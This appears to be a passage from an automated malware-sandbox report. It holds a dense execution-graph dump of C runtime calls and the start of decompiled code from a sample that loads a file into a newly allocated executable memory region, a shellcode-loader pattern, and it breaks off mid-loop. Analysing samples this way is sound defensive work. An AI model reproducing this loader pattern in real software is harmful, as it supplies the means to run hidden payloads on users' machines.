                • Instruction Fuzzy Hash: 52F0A736249D51DAC2129B255C44D6B7A94EF91355F14057AF440F3180D335A815ABBB
                Uniqueness

                Uniqueness Score: -1.00%

                Execution Graph

                Execution Coverage:3.4%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:8.9%
                Total number of Nodes:1636
                Total number of Limit Nodes:52
11732->11803 11734 eb06cd 11734->11706 11736 eb215d __commit 11735->11736 11737 eb217e 11736->11737 11738 eb2166 11736->11738 11741 eb22c8 __malloc_crt 58 API calls 11737->11741 11752 eb219f __commit 11737->11752 11739 eb13b8 __FF_MSGBANNER 58 API calls 11738->11739 11740 eb216b 11739->11740 11742 eb1415 __NMSG_WRITE 58 API calls 11740->11742 11743 eb2193 11741->11743 11744 eb2172 11742->11744 11745 eb219a 11743->11745 11746 eb21a9 11743->11746 11748 eb08fd _fast_error_exit 3 API calls 11744->11748 11749 eaf100 ___strgtold12_l 58 API calls 11745->11749 11747 eb20a9 __lock 58 API calls 11746->11747 11750 eb21b0 11747->11750 11751 eb217c 11748->11751 11749->11752 11753 eb21bd 11750->11753 11754 eb21d5 11750->11754 11751->11737 11752->11726 11766 eb19da 11753->11766 11756 eb2248 _free 58 API calls 11754->11756 11757 eb21c9 11756->11757 11769 eb21f1 11757->11769 11760 eb13b8 __FF_MSGBANNER 58 API calls 11759->11760 11761 eb0a28 11760->11761 11762 eb1415 __NMSG_WRITE 58 API calls 11761->11762 11763 eb0a30 11762->11763 11773 eb0ade 11763->11773 11767 eb19ea 11766->11767 11768 eb19f7 InitializeCriticalSectionAndSpinCount 11766->11768 11767->11757 11768->11757 11772 eb2233 LeaveCriticalSection 11769->11772 11771 eb21f8 11771->11752 11772->11771 11776 eb0c00 11773->11776 11775 eb0a3b 11777 eb0c0c __commit 11776->11777 11778 eb20a9 __lock 51 API calls 11777->11778 11779 eb0c13 11778->11779 11780 eb0c41 DecodePointer 11779->11780 11783 eb0ccc __initterm 11779->11783 11782 eb0c58 DecodePointer 11780->11782 11780->11783 11789 eb0c68 11782->11789 11796 eb0d1a 11783->11796 11785 eb0d29 __commit 11785->11775 11787 eb0c75 EncodePointer 11787->11789 11788 eb0d11 11790 eb08fd _fast_error_exit 3 API calls 11788->11790 11789->11783 11789->11787 11791 eb0c85 DecodePointer EncodePointer 11789->11791 11792 eb0d1a 11790->11792 11794 eb0c97 DecodePointer DecodePointer 11791->11794 11793 eb0d27 11792->11793 11801 eb2233 LeaveCriticalSection 11792->11801 11793->11775 11794->11789 11797 eb0cfa 
11796->11797 11798 eb0d20 11796->11798 11797->11785 11800 eb2233 LeaveCriticalSection 11797->11800 11799 eb2233 _doexit LeaveCriticalSection 11798->11799 11799->11797 11800->11788 11801->11793 11802->11731 11803->11734 13015 ea42ce 13016 eb0d08 13015->13016 13017 eb0d11 13016->13017 13023 eb2233 LeaveCriticalSection 13016->13023 13019 eb08fd _fast_error_exit 3 API calls 13017->13019 13020 eb0d1a 13019->13020 13022 eb0d27 13020->13022 13024 eb2233 LeaveCriticalSection 13020->13024 13023->13017 13024->13022 13438 eb4c49 13439 eb20a9 __lock 58 API calls 13438->13439 13440 eb4c54 DecodePointer EncodePointer 13439->13440 13443 eb2233 LeaveCriticalSection 13440->13443 13442 eb4c78 13443->13442 13552 ea5641 13553 eb7659 13552->13553 13554 eb765e 13553->13554 13555 eb7665 13553->13555 13598 ebea44 13554->13598 13638 ebe1d4 13555->13638 13558 eb7663 13559 eb76c8 13558->13559 13560 eb7671 13558->13560 13687 eba06a 13559->13687 13676 eb7294 13560->13676 13563 eb76ce 13564 eb77d0 __NMSG_WRITE 13563->13564 13566 eb9fdb __crtGetLocaleInfoA_stat GetLocaleInfoW 13563->13566 13570 eb5727 __NMSG_WRITE 58 API calls 13564->13570 13575 eb76bd 13564->13575 13565 eb76b2 13569 eb5727 __NMSG_WRITE 58 API calls 13565->13569 13574 eb7786 _memmove 13565->13574 13565->13575 13567 eb76eb 13566->13567 13571 eb76fc GetACP 13567->13571 13573 eb7708 13567->13573 13568 eb7689 __NMSG_WRITE 13568->13565 13572 eb5727 __NMSG_WRITE 58 API calls 13568->13572 13569->13574 13570->13575 13571->13573 13572->13565 13576 eb5727 __NMSG_WRITE 58 API calls 13573->13576 13574->13575 13577 eb55ad ___crtDownlevelLCIDToLocaleName 58 API calls 13574->13577 13579 eaeb49 __invoke_watson 8 API calls 13575->13579 13578 eb7726 13576->13578 13577->13564 13578->13575 13580 eb5727 __NMSG_WRITE 58 API calls 13578->13580 13584 eb780c __commit 13579->13584 13581 eb773c 13580->13581 13581->13575 13582 eb5727 __NMSG_WRITE 58 API calls 13581->13582 13582->13565 13583 eb78a5 __commit 13584->13583 13585 eb20a9 __lock 58 API calls 
13584->13585 13588 eb782b 13585->13588 13586 eb7851 13691 eb78af 13586->13691 13588->13586 13590 eb2248 _free 58 API calls 13588->13590 13590->13586 13591 eb789f 13592 eb2248 _free 58 API calls 13591->13592 13592->13583 13593 eb20a9 __lock 58 API calls 13594 eb786a ___removelocaleref 13593->13594 13596 eb40ee ___freetlocinfo 58 API calls 13594->13596 13597 eb7892 13594->13597 13596->13597 13694 eb78bb 13597->13694 13599 eb0595 ___get_qualified_locale_downlevel 58 API calls 13598->13599 13600 ebea6b _memset 13599->13600 13601 eb0595 ___get_qualified_locale_downlevel 58 API calls 13600->13601 13606 ebea87 13601->13606 13602 ebea94 GetUserDefaultLCID 13609 ebeb32 13602->13609 13604 ebeaca 13605 ebeb3f 13604->13605 13608 ebeadd 13604->13608 13605->13602 13612 ebeb4a 13605->13612 13606->13602 13606->13604 13697 ebe9da 13606->13697 13611 ebeaf3 13608->13611 13615 ebeae8 13608->13615 13632 ebec45 13609->13632 13716 ebe8c3 13609->13716 13706 ebe521 13611->13706 13711 ebe448 13612->13711 13614 eb1e0d ___strgtold12_l 6 API calls 13618 ebec5c 13614->13618 13701 ebe4a4 13615->13701 13618->13558 13620 ebeaf1 13620->13609 13622 ebe9da _TranslateName 60 API calls 13620->13622 13621 ebebad IsValidCodePage 13623 ebebbf IsValidLocale 13621->13623 13621->13632 13624 ebeb15 13622->13624 13625 ebebce 13623->13625 13623->13632 13624->13609 13626 ebeb34 13624->13626 13627 ebeb29 13624->13627 13726 eb9e9b 13625->13726 13628 ebe521 _GetLcidFromLanguage 59 API calls 13626->13628 13630 ebe4a4 _GetLcidFromLangCountry 59 API calls 13627->13630 13628->13609 13630->13609 13632->13614 13633 eb9e9b ___crtDownlevelLCIDToLocaleName 58 API calls 13634 ebec03 GetLocaleInfoW 13633->13634 13634->13632 13635 ebec1d GetLocaleInfoW 13634->13635 13635->13632 13636 ebec34 13635->13636 13733 ebee0f 13636->13733 13639 eb0595 ___get_qualified_locale_downlevel 58 API calls 13638->13639 13640 ebe1e0 13639->13640 13641 ebe219 13640->13641 13763 ebe16a 13640->13763 13643 ebe26c 13641->13643 13645 ebe226 
_GetLocaleNameFromLangCountry _GetLocaleNameFromLanguage 13641->13645 13767 ebdc12 13643->13767 13647 ebe16a _TranslateName 60 API calls 13645->13647 13649 ebe24d _GetLocaleNameFromLangCountry _GetLocaleNameFromLanguage 13645->13649 13647->13649 13651 ebe37a 13649->13651 13778 ebe04e 13649->13778 13650 ebe2ae IsValidCodePage 13650->13651 13652 ebe2c0 __NMSG_WRITE 13650->13652 13651->13558 13652->13651 13653 eb5727 __NMSG_WRITE 58 API calls 13652->13653 13654 ebe2f4 13653->13654 13655 ebe38b 13654->13655 13656 ebe2ff 13654->13656 13657 eaeb49 __invoke_watson 8 API calls 13655->13657 13658 eb9fdb __crtGetLocaleInfoA_stat GetLocaleInfoW 13656->13658 13660 ebe397 13657->13660 13659 ebe30d 13658->13659 13659->13651 13662 eb9fdb __crtGetLocaleInfoA_stat GetLocaleInfoW 13659->13662 13661 eb0595 ___get_qualified_locale_downlevel 58 API calls 13660->13661 13663 ebe3b6 13661->13663 13666 ebe32e _wcschr 13662->13666 13664 eb0595 ___get_qualified_locale_downlevel 58 API calls 13663->13664 13665 ebe3bd _LcidFromHexString 13664->13665 13667 ebe3c9 GetLocaleInfoW 13665->13667 13666->13651 13669 eb9fdb __crtGetLocaleInfoA_stat GetLocaleInfoW 13666->13669 13672 ebe362 13666->13672 13668 ebe3ff 13667->13668 13673 ebe3fa _LangCountryEnumProc@4 13667->13673 13670 ebf0c9 _TranslateName 60 API calls 13668->13670 13669->13672 13670->13673 13671 eb1e0d ___strgtold12_l 6 API calls 13674 ebe442 13671->13674 13672->13651 13675 ebee0f __itow_s 58 API calls 13672->13675 13673->13671 13674->13558 13675->13651 13677 eb55ad ___crtDownlevelLCIDToLocaleName 58 API calls 13676->13677 13678 eb72a8 13677->13678 13679 eb72b1 13678->13679 13680 eb72f7 13678->13680 13684 eb72cf 13679->13684 13795 eb7a4a 13679->13795 13681 eaeb49 __invoke_watson 8 API calls 13680->13681 13682 eb7301 13681->13682 13685 eb7a4a __wsetlocale_get_all 91 API calls 13684->13685 13686 eb72f0 13684->13686 13685->13686 13686->13568 13688 eba07a 13687->13688 13689 eba081 ___crtLCMapStringW 13687->13689 13688->13563 13690 eba08b 
IsValidLocale 13689->13690 13690->13563 14055 eb2233 LeaveCriticalSection 13691->14055 13693 eb785e 13693->13591 13693->13593 14056 eb2233 LeaveCriticalSection 13694->14056 13696 eb78c2 13696->13591 13698 ebe9eb 13697->13698 13699 ebea38 13697->13699 13698->13699 13737 ebf0c9 13698->13737 13699->13604 13702 eb0595 ___get_qualified_locale_downlevel 58 API calls 13701->13702 13703 ebe4ae _GetPrimaryLen __NMSG_WRITE 13702->13703 13704 ebe4f5 EnumSystemLocalesW 13703->13704 13705 ebe50d 13704->13705 13705->13620 13707 eb0595 ___get_qualified_locale_downlevel 58 API calls 13706->13707 13708 ebe52a _GetPrimaryLen __NMSG_WRITE 13707->13708 13709 ebe559 EnumSystemLocalesW 13708->13709 13710 ebe575 13709->13710 13710->13620 13712 eb0595 ___get_qualified_locale_downlevel 58 API calls 13711->13712 13713 ebe451 __NMSG_WRITE 13712->13713 13714 ebe45e EnumSystemLocalesW 13713->13714 13715 ebe483 13714->13715 13715->13609 13717 ebe920 GetLocaleInfoW 13716->13717 13721 ebe8ce __wsetlocale_get_all 13716->13721 13718 ebe93f 13717->13718 13719 ebe911 13717->13719 13718->13719 13720 ebe946 GetACP 13718->13720 13719->13621 13719->13632 13721->13717 13722 ebe8e5 __wsetlocale_get_all 13721->13722 13723 ebe917 13722->13723 13724 ebe8f6 GetLocaleInfoW 13722->13724 13757 ebefc5 13723->13757 13724->13719 13727 eb9efe 13726->13727 13728 eb9ea8 _GetTableIndexFromLcid _wcsnlen 13726->13728 13727->13632 13727->13633 13728->13727 13729 eb55ad ___crtDownlevelLCIDToLocaleName 58 API calls 13728->13729 13730 eb9ef7 13729->13730 13730->13727 13731 eaeb49 __invoke_watson 8 API calls 13730->13731 13732 eb9f16 13731->13732 13734 ebee1b 13733->13734 13735 ebee95 _xtow_s@20 58 API calls 13734->13735 13736 ebee36 13735->13736 13736->13632 13738 ebf14a 13737->13738 13739 ebf0d5 13737->13739 13747 ebf15c 13738->13747 13742 eaf100 ___strgtold12_l 58 API calls 13739->13742 13746 ebf0fa 13739->13746 13743 ebf0e1 13742->13743 13744 eaeb1e ___strgtold12_l 9 API calls 13743->13744 13745 ebf0ec 13744->13745 
13745->13698 13746->13698 13748 eb2db9 _LocaleUpdate::_LocaleUpdate 58 API calls 13747->13748 13749 ebf16f 13748->13749 13750 ebf17d 13749->13750 13751 ebf197 13749->13751 13752 eaf100 ___strgtold12_l 58 API calls 13750->13752 13755 eb70fa 60 API calls __towlower_l 13751->13755 13756 ebf157 13751->13756 13753 ebf182 13752->13753 13754 eaeb1e ___strgtold12_l 9 API calls 13753->13754 13754->13756 13755->13751 13756->13698 13760 ebf4e6 13757->13760 13761 ebf2d5 wcstoxl 59 API calls 13760->13761 13762 ebefd4 13761->13762 13762->13719 13764 ebe17b 13763->13764 13765 ebe1c8 13763->13765 13764->13765 13766 ebf0c9 _TranslateName 60 API calls 13764->13766 13765->13641 13766->13764 13790 eba03f 13767->13790 13769 ebdc6f 13771 eb1e0d ___strgtold12_l 6 API calls 13769->13771 13770 ebdc3e __NMSG_WRITE 13770->13769 13773 eb5727 __NMSG_WRITE 58 API calls 13770->13773 13772 ebdc7a 13771->13772 13772->13649 13774 ebdc68 13773->13774 13774->13769 13775 ebdc7e 13774->13775 13776 eaeb49 __invoke_watson 8 API calls 13775->13776 13777 ebdc8a 13776->13777 13779 ebe059 __wsetlocale_get_all 13778->13779 13780 ebe0b0 13778->13780 13779->13780 13784 ebe070 __wsetlocale_get_all 13779->13784 13781 eb9fdb __crtGetLocaleInfoA_stat GetLocaleInfoW 13780->13781 13782 ebe0c9 13781->13782 13783 ebe0db GetACP 13782->13783 13789 ebe09a 13782->13789 13785 ebe081 13784->13785 13786 ebe0a7 13784->13786 13787 eb9fdb __crtGetLocaleInfoA_stat GetLocaleInfoW 13785->13787 13788 ebefc5 ___get_qualified_locale_downlevel 59 API calls 13786->13788 13787->13789 13788->13789 13789->13650 13789->13651 13791 eba059 GetUserDefaultLCID 13790->13791 13792 eba055 13790->13792 13793 eb9e9b ___crtDownlevelLCIDToLocaleName 58 API calls 13791->13793 13792->13770 13794 eba065 13793->13794 13794->13770 13796 eb7a79 13795->13796 13798 eb7a58 13795->13798 13796->13684 13797 eb56bb __NMSG_WRITE 58 API calls 13797->13798 13798->13796 13798->13797 13799 eb7a7e 13798->13799 13800 eaeb49 __invoke_watson 8 API calls 13799->13800 13801 
eb7a88 __commit 13800->13801 13802 eb7aa0 13801->13802 13803 eb7ab7 13801->13803 13804 eaf100 ___strgtold12_l 58 API calls 13802->13804 13805 eb0595 ___get_qualified_locale_downlevel 58 API calls 13803->13805 13806 eb7aa5 13804->13806 13807 eb7abc 13805->13807 13808 eaeb1e ___strgtold12_l 9 API calls 13806->13808 13809 eb42e8 _LocaleUpdate::_LocaleUpdate 58 API calls 13807->13809 13813 eb7ab0 __commit __wsetlocale_get_all 13808->13813 13810 eb7ac6 13809->13810 13811 eb2280 __calloc_crt 58 API calls 13810->13811 13812 eb7ad9 13811->13812 13812->13813 13814 eb20a9 __lock 58 API calls 13812->13814 13813->13684 13815 eb7aef __copytlocinfo_nolock 13814->13815 13830 eb7bbf 13815->13830 13820 eb7bd9 ___removelocaleref 13823 eb40ee ___freetlocinfo 58 API calls 13820->13823 13821 eb7b27 __wsetlocale_get_all 13822 eb20a9 __lock 58 API calls 13821->13822 13824 eb7b51 13822->13824 13823->13813 13825 eb4368 __updatetlocinfoEx_nolock 58 API calls 13824->13825 13827 eb7b63 ___removelocaleref 13825->13827 13826 eb7b88 13854 eb7bce 13826->13854 13827->13826 13829 eb4368 __updatetlocinfoEx_nolock 58 API calls 13827->13829 13829->13826 13857 eb2233 LeaveCriticalSection 13830->13857 13832 eb7b0b 13833 eb7d73 13832->13833 13834 eb7d9c 13833->13834 13841 eb7dbb 13833->13841 13835 eb7da8 13834->13835 13858 eb7ffc 13834->13858 13840 eb1e0d ___strgtold12_l 6 API calls 13835->13840 13836 eb7f2b 13836->13835 13945 eb7c06 13836->13945 13838 eb7f3f 13887 eb7516 13838->13887 13843 eb7b17 13840->13843 13841->13836 13841->13838 13847 eb7df7 _wcscspn _wcspbrk __wopenfile __NMSG_WRITE 13841->13847 13843->13820 13843->13821 13844 eb7f5b __wsetlocale_get_all 13844->13835 13844->13836 13845 eb7ffc __wsetlocale_set_cat 91 API calls 13844->13845 13845->13844 13846 eb5727 __NMSG_WRITE 58 API calls 13846->13847 13847->13835 13847->13836 13847->13846 13848 eb7fef 13847->13848 13850 eb7fea 13847->13850 13852 eb7ffc __wsetlocale_set_cat 91 API calls 13847->13852 13849 eaeb49 __invoke_watson 8 API calls 
13848->13849 13851 eb7ffb 13849->13851 13987 eb5b21 13850->13987 13852->13847 14054 eb2233 LeaveCriticalSection 13854->14054 13856 eb7bd5 13856->13813 13857->13832 13859 eb0595 ___get_qualified_locale_downlevel 58 API calls 13858->13859 13860 eb8026 13859->13860 13861 eb7516 __expandlocale 91 API calls 13860->13861 13865 eb8053 __wsetlocale_get_all __NMSG_WRITE 13861->13865 13862 eb805a 13863 eb1e0d ___strgtold12_l 6 API calls 13862->13863 13864 eb8069 13863->13864 13864->13835 13865->13862 13866 eb22c8 __malloc_crt 58 API calls 13865->13866 13867 eb80ae 13866->13867 13867->13862 13868 eb55ad ___crtDownlevelLCIDToLocaleName 58 API calls 13867->13868 13869 eb80f7 13868->13869 13870 eb8372 13869->13870 13874 eb8121 13869->13874 13990 eb721d 13869->13990 13871 eaeb49 __invoke_watson 8 API calls 13870->13871 13872 eb83a5 13871->13872 13872->13835 13877 eb9b90 ___crtGetStringTypeA 61 API calls 13874->13877 13884 eb821c _memcmp 13874->13884 13875 eb82fb 13878 eb2248 _free 58 API calls 13875->13878 13876 eb833a 13876->13870 13880 eb2248 _free 58 API calls 13876->13880 13877->13884 13879 eb8311 13878->13879 13881 eb2248 _free 58 API calls 13879->13881 13882 eb8357 13880->13882 13881->13862 13883 eb2248 _free 58 API calls 13882->13883 13885 eb8360 13883->13885 13884->13875 13884->13876 13886 eb2248 _free 58 API calls 13885->13886 13886->13870 13888 eb0595 ___get_qualified_locale_downlevel 58 API calls 13887->13888 13889 eb7549 13888->13889 13890 eb7579 13889->13890 13891 eb5727 __NMSG_WRITE 58 API calls 13889->13891 13892 eb1e0d ___strgtold12_l 6 API calls 13890->13892 13893 eb75a3 13891->13893 13894 eb7588 13892->13894 13895 eb75ba 13893->13895 13900 eb75e3 __wsetlocale_get_all __NMSG_WRITE 13893->13900 13942 eb76bd 13893->13942 13894->13844 13897 eb55ad ___crtDownlevelLCIDToLocaleName 58 API calls 13895->13897 13896 eaeb49 __invoke_watson 8 API calls 13903 eb780c __commit 13896->13903 13898 eb75ce 13897->13898 13898->13890 13898->13942 13904 eb7786 _memmove 13900->13904 
14034 eb7302 13900->14034 13901 eb7645 13905 eb76c2 13901->13905 13909 eb765e 13901->13909 13910 eb7665 13901->13910 13902 eb78a5 __commit 13902->13844 13903->13902 13906 eb20a9 __lock 58 API calls 13903->13906 13908 eb55ad ___crtDownlevelLCIDToLocaleName 58 API calls 13904->13908 13904->13942 13911 eba06a __expandlocale IsValidLocale 13905->13911 13917 eb782b 13906->13917 13907 eb7851 13914 eb78af __expandlocale LeaveCriticalSection 13907->13914 13919 eb77d0 __NMSG_WRITE 13908->13919 13915 ebea44 ___get_qualified_locale_downlevel 71 API calls 13909->13915 13913 ebe1d4 ___get_qualified_locale 65 API calls 13910->13913 13912 eb76ce 13911->13912 13912->13919 13920 eb9fdb __crtGetLocaleInfoA_stat GetLocaleInfoW 13912->13920 13916 eb7663 13913->13916 13918 eb785e 13914->13918 13915->13916 13916->13905 13922 eb7671 13916->13922 13917->13907 13921 eb2248 _free 58 API calls 13917->13921 13923 eb789f 13918->13923 13927 eb20a9 __lock 58 API calls 13918->13927 13928 eb5727 __NMSG_WRITE 58 API calls 13919->13928 13919->13942 13924 eb76eb 13920->13924 13921->13907 13925 eb7294 __expandlocale 90 API calls 13922->13925 13926 eb2248 _free 58 API calls 13923->13926 13929 eb76fc GetACP 13924->13929 13930 eb7708 13924->13930 13934 eb7689 __NMSG_WRITE 13925->13934 13926->13902 13936 eb786a ___removelocaleref 13927->13936 13928->13942 13929->13930 13932 eb5727 __NMSG_WRITE 58 API calls 13930->13932 13931 eb76b2 13931->13904 13937 eb5727 __NMSG_WRITE 58 API calls 13931->13937 13931->13942 13933 eb7726 13932->13933 13940 eb5727 __NMSG_WRITE 58 API calls 13933->13940 13933->13942 13934->13931 13939 eb5727 __NMSG_WRITE 58 API calls 13934->13939 13935 eb7892 13938 eb78bb __expandlocale LeaveCriticalSection 13935->13938 13936->13935 13941 eb40ee ___freetlocinfo 58 API calls 13936->13941 13937->13904 13938->13923 13939->13931 13943 eb773c 13940->13943 13941->13935 13942->13896 13943->13942 13944 eb5727 __NMSG_WRITE 58 API calls 13943->13944 13944->13931 13946 eb22c8 __malloc_crt 58 API calls 
13945->13946 13947 eb7c1e 13946->13947 13948 eb7a4a __wsetlocale_get_all 91 API calls 13947->13948 13975 eb7d01 13947->13975 13952 eb7c52 __wsetlocale_get_all 13948->13952 13949 eb56bb __NMSG_WRITE 58 API calls 13949->13952 13950 eb7d66 13951 eaeb49 __invoke_watson 8 API calls 13950->13951 13953 eb7d72 13951->13953 13952->13949 13952->13950 13954 eb7a4a __wsetlocale_get_all 91 API calls 13952->13954 13956 eb7cca 13952->13956 13955 eb7d9c 13953->13955 13967 eb7dbb 13953->13967 13954->13952 13957 eb7da8 13955->13957 13961 eb7ffc __wsetlocale_set_cat 91 API calls 13955->13961 13959 eb7d1a 13956->13959 13960 eb7cd0 13956->13960 13966 eb1e0d ___strgtold12_l 6 API calls 13957->13966 13958 eb7f2b 13958->13957 13963 eb7c06 __wsetlocale_get_all 91 API calls 13958->13963 13964 eb2248 _free 58 API calls 13959->13964 13965 eb7cea 13960->13965 13972 eb2248 _free 58 API calls 13960->13972 13961->13957 13962 eb7f3f 13968 eb7516 __expandlocale 91 API calls 13962->13968 13963->13957 13969 eb7d20 13964->13969 13973 eb2248 _free 58 API calls 13965->13973 13965->13975 13970 eb7fe6 13966->13970 13967->13958 13967->13962 13980 eb7df7 _wcscspn _wcspbrk __wopenfile __NMSG_WRITE 13967->13980 13977 eb7f5b __wsetlocale_get_all 13968->13977 13971 eb7d3b 13969->13971 13974 eb2248 _free 58 API calls 13969->13974 13970->13835 13971->13975 13976 eb2248 _free 58 API calls 13971->13976 13972->13965 13973->13975 13974->13971 13975->13835 13976->13975 13977->13957 13977->13958 13978 eb7ffc __wsetlocale_set_cat 91 API calls 13977->13978 13978->13977 13979 eb5727 __NMSG_WRITE 58 API calls 13979->13980 13980->13957 13980->13958 13980->13979 13981 eb7fef 13980->13981 13983 eb7fea 13980->13983 13985 eb7ffc __wsetlocale_set_cat 91 API calls 13980->13985 13982 eaeb49 __invoke_watson 8 API calls 13981->13982 13984 eb7ffb 13982->13984 13986 eb5b21 __wsetlocale_nolock 6 API calls 13983->13986 13985->13980 13986->13981 14050 eb5b2d IsProcessorFeaturePresent 13987->14050 13991 eb7226 13990->13991 13992 eb722a 
_wcsnlen 13990->13992 13991->13874 13993 eb22c8 __malloc_crt 58 API calls 13992->13993 13997 eb723e 13992->13997 13994 eb7250 13993->13994 13995 eb5727 __NMSG_WRITE 58 API calls 13994->13995 13994->13997 13996 eb7269 13995->13996 13996->13997 13998 eaeb49 __invoke_watson 8 API calls 13996->13998 13997->13874 13999 eb7280 13998->13999 14000 eb7501 13999->14000 14001 eb74d7 MultiByteToWideChar 13999->14001 14003 eb1e0d ___strgtold12_l 6 API calls 14000->14003 14001->14000 14002 eb74f4 14001->14002 14006 eb7973 14002->14006 14005 eb7512 14003->14005 14005->13874 14007 eb797e 14006->14007 14030 eb799c 14006->14030 14008 eb2280 __calloc_crt 58 API calls 14007->14008 14007->14030 14009 eb798f 14008->14009 14010 eb7997 14009->14010 14011 eb2280 __calloc_crt 58 API calls 14009->14011 14012 eaf100 ___strgtold12_l 58 API calls 14010->14012 14013 eb79b3 14011->14013 14012->14030 14014 eb79bb 14013->14014 14015 eb79c4 14013->14015 14016 eb2248 _free 58 API calls 14014->14016 14017 eb2280 __calloc_crt 58 API calls 14015->14017 14016->14010 14018 eb79cf 14017->14018 14019 eb79e8 __copytlocinfo_nolock 14018->14019 14020 eb79d8 14018->14020 14023 eb7d73 __wsetlocale_nolock 91 API calls 14019->14023 14021 eb2248 _free 58 API calls 14020->14021 14022 eb79df 14021->14022 14024 eb2248 _free 58 API calls 14022->14024 14025 eb7a01 14023->14025 14024->14010 14026 eb7a15 14025->14026 14027 eb48e9 __setmbcp_nolock 70 API calls 14025->14027 14028 eb2248 _free 58 API calls 14026->14028 14026->14030 14027->14026 14029 eb7a23 ___removelocaleref 14028->14029 14031 eb40ee ___freetlocinfo 58 API calls 14029->14031 14030->14000 14032 eb7a31 14031->14032 14033 eb2248 _free 58 API calls 14032->14033 14033->14030 14036 eb731a _memset 14034->14036 14035 eb7328 14035->13901 14036->14035 14037 eb733f 14036->14037 14040 eb7364 _wcscspn 14036->14040 14038 eb5727 __NMSG_WRITE 58 API calls 14037->14038 14044 eb7350 14038->14044 14039 eaeb49 __invoke_watson 8 API calls 14041 eb742d 14039->14041 14040->14035 
14043 eb5727 __NMSG_WRITE 58 API calls 14040->14043 14040->14044 14042 eb0595 ___get_qualified_locale_downlevel 58 API calls 14041->14042 14045 eb7437 14042->14045 14043->14040 14044->14035 14044->14039 14046 eb746c 14045->14046 14047 eaf100 ___strgtold12_l 58 API calls 14045->14047 14046->13901 14048 eb7461 14047->14048 14049 eaeb1e ___strgtold12_l 9 API calls 14048->14049 14049->14046 14051 eb5b41 14050->14051 14052 eb59e9 ___raise_securityfailure 5 API calls 14051->14052 14053 eb5b2b 14052->14053 14053->13848 14054->13856 14055->13693 14056->13696 11804 ea6b5a 11805 eae8fc 11804->11805 11806 eae8fe 11805->11806 11807 eae887 11805->11807 11808 eae8dc 11806->11808 11809 eae900 11806->11809 11810 eae895 11807->11810 11812 eb0a20 __amsg_exit 58 API calls 11807->11812 11860 eb0a4b 11808->11860 11811 eae90c 11809->11811 11815 eb0ade _abort 58 API calls 11809->11815 11828 eb12d6 11810->11828 11863 eb0a3c 11811->11863 11812->11810 11815->11811 11818 eae8a6 11842 eb0a5a 11818->11842 11820 eb0a20 __amsg_exit 58 API calls 11820->11818 11821 eae8ae 11823 eae8b9 __wwincmdln 11821->11823 11824 eb0a20 __amsg_exit 58 API calls 11821->11824 11822 eae8e1 __commit 11848 ea1000 GetCommandLineW CommandLineToArgvW 11823->11848 11824->11823 11829 eb12ef __NMSG_WRITE 11828->11829 11833 eae89b 11828->11833 11830 eb2280 __calloc_crt 58 API calls 11829->11830 11838 eb1318 __NMSG_WRITE 11830->11838 11831 eb136f 11832 eb2248 _free 58 API calls 11831->11832 11832->11833 11833->11818 11833->11820 11834 eb2280 __calloc_crt 58 API calls 11834->11838 11835 eb1394 11836 eb2248 _free 58 API calls 11835->11836 11836->11833 11837 eb55ad ___crtDownlevelLCIDToLocaleName 58 API calls 11837->11838 11838->11831 11838->11833 11838->11834 11838->11835 11838->11837 11839 eb13ab 11838->11839 11840 eaeb49 __invoke_watson 8 API calls 11839->11840 11841 eb13b7 11840->11841 11844 eb0a66 __IsNonwritableInCurrentImage 11842->11844 11866 eb4c14 11844->11866 11845 eb0a84 __initterm_e 11847 eb0aa3 
__IsNonwritableInCurrentImage __initterm 11845->11847 11869 eb4bff 11845->11869 11847->11821 11935 eae383 11848->11935 11851 ea1048 _memset 11853 ea1058 VirtualAlloc 11851->11853 11852 ea109d 11852->11808 11857 eb0d2f 11852->11857 11938 eae687 11853->11938 11858 eb0c00 _doexit 58 API calls 11857->11858 11859 eb0d3e 11858->11859 11859->11808 11861 eb0c00 _doexit 58 API calls 11860->11861 11862 eb0a56 11861->11862 11862->11822 11864 eb0c00 _doexit 58 API calls 11863->11864 11865 eb0a47 11864->11865 11865->11822 11867 eb4c17 EncodePointer 11866->11867 11867->11867 11868 eb4c31 11867->11868 11868->11845 11872 eb4b03 11869->11872 11871 eb4c0a 11871->11847 11873 eb4b0f __commit 11872->11873 11880 eb0bee 11873->11880 11879 eb4b36 __commit 11879->11871 11881 eb20a9 __lock 58 API calls 11880->11881 11882 eb0bf5 11881->11882 11883 eb4b47 DecodePointer DecodePointer 11882->11883 11884 eb4b24 11883->11884 11885 eb4b74 11883->11885 11894 eb4b41 11884->11894 11885->11884 11897 eb9bd0 11885->11897 11887 eb4bd7 EncodePointer EncodePointer 11887->11884 11888 eb4bab 11888->11884 11891 eb230f __realloc_crt 61 API calls 11888->11891 11893 eb4bc5 EncodePointer 11888->11893 11889 eb4b86 11889->11887 11889->11888 11904 eb230f 11889->11904 11892 eb4bbf 11891->11892 11892->11884 11892->11893 11893->11887 11931 eb0bf7 11894->11931 11898 eb9bd9 11897->11898 11899 eb9bee HeapSize 11897->11899 11900 eaf100 ___strgtold12_l 58 API calls 11898->11900 11899->11889 11901 eb9bde 11900->11901 11902 eaeb1e ___strgtold12_l 9 API calls 11901->11902 11903 eb9be9 11902->11903 11903->11889 11906 eb2316 11904->11906 11907 eb2353 11906->11907 11909 eb6902 11906->11909 11930 eb1d65 Sleep 11906->11930 11907->11888 11910 eb690b 11909->11910 11911 eb6916 11909->11911 11913 eb6870 _malloc 58 API calls 11910->11913 11912 eb691e 11911->11912 11922 eb692b 11911->11922 11914 eb2248 _free 58 API calls 11912->11914 11915 eb6913 11913->11915 11923 eb6926 _rand_s 11914->11923 11915->11906 11916 eb6963 11918 eb4c7e 

                Control-flow Graph

                C-Code - Quality: 91%
                			E00EA1000(void* __edx) {
                				int _v8;
                				void* _t8;
                				void* _t9;
                				_Unknown_base(*)()* _t12;
                				signed int _t17;
                				signed int _t20;
                				signed int _t23;
                				void* _t25;
                				signed int _t36;
                				signed int _t37;
                				signed int _t39;
                				void* _t44;
                				void* _t45;
                				_Unknown_base(*)()* _t52;
                				void* _t54;
                
                				_t44 = __edx;
                				_t54 = 0;
                				_t8 = E00EAE383((CommandLineToArgvW(GetCommandLineW(),  &_v8))[1], 0xece000); // executed
                				_t25 = _t8;
                				_t9 = VirtualAlloc(0, 0x1ad27480, 0x3000, 4); // executed
                				if(_t9 == 0) {
                					return 0;
                				} else {
                					E00EAE740(_t9, 0x99, 0x1ad27480);
                					_t12 = VirtualAlloc(0, 0x12cb, 0x3000, 0x40); // executed
                					_t52 = _t12;
                					E00EAE687(_t52, 0x12cb, 1, _t25); // executed
                					do {
